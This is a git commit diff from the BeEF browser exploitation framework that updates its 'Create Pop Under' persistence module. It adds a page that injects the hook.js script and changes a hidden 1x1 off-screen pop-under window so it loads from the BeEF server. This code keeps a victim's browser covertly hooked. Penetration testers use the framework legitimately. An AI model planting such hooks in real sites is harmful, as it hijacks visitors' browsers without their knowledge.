Popunder window now loads a plain page

This commit is contained in:
bcoles
2012-04-23 17:36:25 +09:30
parent b5b5f0cd1a
commit fa59e633b0
3 changed files with 8 additions and 3 deletions

View File

@@ -0,0 +1,5 @@
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

View File

@@ -15,9 +15,9 @@
//
beef.execute(function() {
var result="Pop-under window successfully created!";
var result = "Pop-under window successfully created!";
window.open(window.location.protocol + '//' + window.location.host + '/demos/basic.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
window.focus();

View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Persistence"
name: "Create Pop Under"
description: "Creates a new discrete pop under window with the beef hook included.<br><br>This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release"
description: "This module creates a new discrete pop under window with the BeEF hook included.<br><br>Another browser node will be added to the hooked browser tree."
authors: ["ethicalhack3r"]
target:
user_notify: ["ALL"]